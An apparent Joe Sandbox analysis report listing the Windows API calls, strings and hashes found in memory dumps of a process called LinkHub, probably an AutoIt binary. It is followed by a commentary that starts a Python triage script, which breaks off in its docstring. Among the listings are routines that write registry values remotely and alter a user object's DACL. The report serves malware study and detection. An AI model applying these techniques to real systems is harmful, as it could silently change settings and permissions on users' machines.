                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 661914facb60965a4e483d11c89db693cde2875b0a006db9acc84d48d677dc18
                                                                    • Instruction ID: 795c6525a7c6b1a0f9fe77cd95a100624a1991b253381b615796e05fef94168d
                                                                    • Opcode Fuzzy Hash: 661914facb60965a4e483d11c89db693cde2875b0a006db9acc84d48d677dc18
                                                                    • Instruction Fuzzy Hash: C4026175500209AFDB14DFA5CD89EAE7BB9FF49310F048159FA19DB2A0CB74AE01CB61
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00D07B67
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00D07B98
                                                                    • GetSysColor.USER32(0000000F), ref: 00D07BA4
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00D07BBE
                                                                    • SelectObject.GDI32(?,?), ref: 00D07BCD
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00D07BF8
                                                                    • GetSysColor.USER32(00000010), ref: 00D07C00
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00D07C07
                                                                    • FrameRect.USER32(?,?,00000000), ref: 00D07C16
                                                                    • DeleteObject.GDI32(00000000), ref: 00D07C1D
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00D07C68
                                                                    • FillRect.USER32(?,?,?), ref: 00D07C9A
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D07CBC
                                                                      • Part of subcall function 00D07E22: GetSysColor.USER32(00000012), ref: 00D07E5B
                                                                      • Part of subcall function 00D07E22: SetTextColor.GDI32(?,00D07B2D), ref: 00D07E5F
                                                                      • Part of subcall function 00D07E22: GetSysColorBrush.USER32(0000000F), ref: 00D07E75
                                                                      • Part of subcall function 00D07E22: GetSysColor.USER32(0000000F), ref: 00D07E80
                                                                      • Part of subcall function 00D07E22: GetSysColor.USER32(00000011), ref: 00D07E9D
                                                                      • Part of subcall function 00D07E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D07EAB
                                                                      • Part of subcall function 00D07E22: SelectObject.GDI32(?,00000000), ref: 00D07EBC
                                                                      • Part of subcall function 00D07E22: SetBkColor.GDI32(?,?), ref: 00D07EC5
                                                                      • Part of subcall function 00D07E22: SelectObject.GDI32(?,?), ref: 00D07ED2
                                                                      • Part of subcall function 00D07E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00D07EF1
                                                                      • Part of subcall function 00D07E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D07F08
                                                                      • Part of subcall function 00D07E22: GetWindowLongW.USER32(?,000000F0), ref: 00D07F15
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                    • String ID:
                                                                    • API String ID: 4124339563-0
                                                                    • Opcode ID: 972ad3e40bb52f2153e71da2f9944e9a4f8a09298df4ea34aaaf2b5403cc68f7
                                                                    • Instruction ID: 346193d93095c9b432b452f0086ca88c2feb72a6174ed30cc145caf6e111ee04
                                                                    • Opcode Fuzzy Hash: 972ad3e40bb52f2153e71da2f9944e9a4f8a09298df4ea34aaaf2b5403cc68f7
                                                                    • Instruction Fuzzy Hash: AAA16171408301AFD7119FA4DC48B6B7BAAFF49324F140A1AF96AD62E0D771E944CB62
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?), ref: 00C716B4
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CB2B07
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CB2B40
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00CB2F85
                                                                      • Part of subcall function 00C71802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C71488,?,00000000,?,?,?,?,00C7145A,00000000,?), ref: 00C71865
                                                                    • SendMessageW.USER32(?,00001053), ref: 00CB2FC1
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CB2FD8
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00CB2FEE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00CB2FF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 2760611726-4108050209
                                                                    • Opcode ID: 794738126b6fb7a85fdea3c2286c1b8a20fd495e2577472c42462981d7afa79c
                                                                    • Instruction ID: ddc9fc2573724ca56102622d94cc347efd76a94b8027203ec3184f27a48eecba
                                                                    • Opcode Fuzzy Hash: 794738126b6fb7a85fdea3c2286c1b8a20fd495e2577472c42462981d7afa79c
                                                                    • Instruction Fuzzy Hash: 861290342002519FD725DF18C884BB9BBE6FB45301F588569F8A9DB261C731EE82DFA1
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 00CF319B
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CF32C7
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00CF3306
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00CF3316
                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00CF335D
                                                                    • GetClientRect.USER32(00000000,?), ref: 00CF3369
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00CF33B2
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CF33C1
                                                                    • GetStockObject.GDI32(00000011), ref: 00CF33D1
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00CF33D5
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00CF33E5
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF33EE
                                                                    • DeleteDC.GDI32(00000000), ref: 00CF33F7
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CF3423
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CF343A
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00CF347A
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CF348E
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CF349F
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00CF34D4
                                                                    • GetStockObject.GDI32(00000011), ref: 00CF34DF
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CF34EA
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00CF34F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 8292afa26b5f2a4a389e7694989127dc2362b985d80f8a734c70d274307e1d1e
                                                                    • Instruction ID: 85184d2de2b5d4b5538c0ee91436e46e1bb2047e6a0d25e5db3f441115667df7
                                                                    • Opcode Fuzzy Hash: 8292afa26b5f2a4a389e7694989127dc2362b985d80f8a734c70d274307e1d1e
                                                                    • Instruction Fuzzy Hash: BEB14F75A40209BFEB14DFA8CC49FAE7BB9EB48710F008119FA15E7291DB74AD40CB64
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00CE5532
                                                                    • GetDriveTypeW.KERNEL32(?,00D0DC30,?,\\.\,00D0DCD0), ref: 00CE560F
                                                                    • SetErrorMode.KERNEL32(00000000,00D0DC30,?,\\.\,00D0DCD0), ref: 00CE577B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 7bbbb75b0d343ccd93ed26561867e3249bdc91a755ec8419d5dd74c3df1850ac
                                                                    • Instruction ID: 2cd87afa9dbe1446afba8f5141d742cdf0947a1563973788b90e34298f59f39f
                                                                    • Opcode Fuzzy Hash: 7bbbb75b0d343ccd93ed26561867e3249bdc91a755ec8419d5dd74c3df1850ac
                                                                    • Instruction Fuzzy Hash: DA61F270A08E85DFC734DF26C9919B873A1EF14358F248016F41AAB391C771DE95EB61
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00D01BC4
                                                                    • GetDesktopWindow.USER32 ref: 00D01BD9
                                                                    • GetWindowRect.USER32(00000000), ref: 00D01BE0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D01C35
                                                                    • DestroyWindow.USER32(?), ref: 00D01C55
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D01C89
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D01CA7
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D01CB9
                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00D01CCE
                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00D01CE1
                                                                    • IsWindowVisible.USER32(00000000), ref: 00D01D3D
                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00D01D58
                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00D01D6C
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00D01D84
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00D01DAA
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00D01DC4
                                                                    • CopyRect.USER32(?,?), ref: 00D01DDB
                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00D01E46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 59b6e4c8df1b25f90d860d7330f3397b37400ad8d50e4affda67490351aef082
                                                                    • Instruction ID: 3cd19a078c6fd869738d14c7bd967f566e041df7564fe7d62f47249c9fc38753
                                                                    • Opcode Fuzzy Hash: 59b6e4c8df1b25f90d860d7330f3397b37400ad8d50e4affda67490351aef082
                                                                    • Instruction Fuzzy Hash: C5B16671604301AFD714DF68C884B6ABBE5FF84314F04891DF99D9B2A1CB31E844CBA6
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00D00D81
                                                                    • _wcslen.LIBCMT ref: 00D00DBB
                                                                    • _wcslen.LIBCMT ref: 00D00E25
                                                                    • _wcslen.LIBCMT ref: 00D00E8D
                                                                    • _wcslen.LIBCMT ref: 00D00F11
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00D00F61
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D00FA0
                                                                      • Part of subcall function 00C8FD52: _wcslen.LIBCMT ref: 00C8FD5D
                                                                      • Part of subcall function 00CD2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CD2BA5
                                                                      • Part of subcall function 00CD2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CD2BD7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 1103490817-719923060
                                                                    • Opcode ID: a7f197718d6a4e812a58f4b37b3f6f4ee4024c5f8457b1f546132f78892710ed
                                                                    • Instruction ID: 85096dc6bfd5dd5a24be4cbe6cb1f19f52b32aca92dd8cc99b64f515c312bf91
                                                                    • Opcode Fuzzy Hash: a7f197718d6a4e812a58f4b37b3f6f4ee4024c5f8457b1f546132f78892710ed
                                                                    • Instruction Fuzzy Hash: 4EE1CD352083419FC714DF24C990A2AB7E2BF98314F18896DF49A9B3E1DB30ED45DB62
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C725F8
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00C72600
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C7262B
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00C72633
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00C72658
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C72675
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C72685
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C726B8
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C726CC
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00C726EA
                                                                    • GetStockObject.GDI32(00000011), ref: 00C72706
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C72711
                                                                      • Part of subcall function 00C719CD: GetCursorPos.USER32(?), ref: 00C719E1
                                                                      • Part of subcall function 00C719CD: ScreenToClient.USER32(00000000,?), ref: 00C719FE
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000001), ref: 00C71A23
                                                                      • Part of subcall function 00C719CD: GetAsyncKeyState.USER32(00000002), ref: 00C71A3D
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00C7199C), ref: 00C72738
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 246a3eb0f4c495708dd3e9dbaf961fa8c6d66efe0d5ab239cd80d10c7adfaad1
                                                                    • Instruction ID: 7522b1920407b1ef6090733e188421c5af450aaa13bcb06c179e6f6369bbce4c
                                                                    • Opcode Fuzzy Hash: 246a3eb0f4c495708dd3e9dbaf961fa8c6d66efe0d5ab239cd80d10c7adfaad1
                                                                    • Instruction Fuzzy Hash: EAB13B35A40209AFDB14DFA8CC49BAE7BB5FB48314F10821AFA59E7290D774E941CF61
                                                                    APIs
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD1A60
                                                                      • Part of subcall function 00CD1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A6C
                                                                      • Part of subcall function 00CD1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A7B
                                                                      • Part of subcall function 00CD1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A82
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD1A99
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD1741
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD1775
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD178C
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CD17C6
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD17E2
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD17F9
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00CD1801
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00CD1808
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD1829
                                                                    • CopySid.ADVAPI32(00000000), ref: 00CD1830
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD185F
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD1881
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD1893
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD18BA
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18C1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD18CA
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18D1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD18DA
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18E1
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD18ED
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD18F4
                                                                      • Part of subcall function 00CD1ADF: GetProcessHeap.KERNEL32(00000008,00CD14FD,?,00000000,?,00CD14FD,?), ref: 00CD1AED
                                                                      • Part of subcall function 00CD1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00CD14FD,?), ref: 00CD1AF4
                                                                      • Part of subcall function 00CD1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00CD14FD,?), ref: 00CD1B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: 8f6709f3fa959c0086846fca0609e302d37cbe86866ce29a75f312af5e37ec61
                                                                    • Instruction ID: 0ba47938cbf48adaf8d7721d5a00940ff5ef137d89c7f97c8e53be6f86baf1a7
                                                                    • Opcode Fuzzy Hash: 8f6709f3fa959c0086846fca0609e302d37cbe86866ce29a75f312af5e37ec61
                                                                    • Instruction Fuzzy Hash: DE713CB2D00309BBDB10DFE5DC85FAEBBB9BF44310F194126EA19E6290D7319A05DB60
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFCF1D
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D0DCD0,00000000,?,00000000,?,?), ref: 00CFCFA4
                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CFD004
                                                                    • _wcslen.LIBCMT ref: 00CFD054
                                                                    • _wcslen.LIBCMT ref: 00CFD0CF
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00CFD112
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00CFD221
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00CFD2AD
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFD2E1
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFD2EE
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00CFD3C0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 9721498-966354055
                                                                    • Opcode ID: 5ed89b8f5552634b4508ad1ebb6dd3f0953a4fe3a47eb53720a6ddc9e3975bba
                                                                    • Instruction ID: 26e7d1a44bc10e2c9aa76f1a1a003f426cc0715d2f7b3796bca23ee75b84f367
                                                                    • Opcode Fuzzy Hash: 5ed89b8f5552634b4508ad1ebb6dd3f0953a4fe3a47eb53720a6ddc9e3975bba
                                                                    • Instruction Fuzzy Hash: 45126A356042059FCB14DF24C885B2AB7E6FF88714F04889DF95A9B3A2CB31ED45DB92
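Three of the function listings above can be read mechanically: the registry routine (RegConnectRegistryW, RegCreateKeyExW and four RegSetValueExW calls beside the REG_* strings), the user-object DACL routine (GetUserObjectSecurity, GetAclInformation, AddAce, SetUserObjectSecurity) and the drive-type routine (SetErrorMode around GetDriveTypeW). The Python script below is an added example for this report; it is neither Joe Sandbox code nor part of the analysed sample. It parses lines in exactly the format printed here (the three sample listings are copied from the blocks above), decodes the dwType argument of RegSetValueExW with the documented REG_* values, and flags the other two patterns. The Call record, the rule names and the finding strings are this example's own conventions. Arguments the sandbox printed as "?" are never decoded, so a rule only fires when the literal was recovered.

```python
"""Triage helper for the per-function "APIs" listings in this report.

Added example; not part of Joe Sandbox or of the analysed sample. It parses
report lines such as
    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00CFD112
    • _wcslen.LIBCMT ref: 00CFD054
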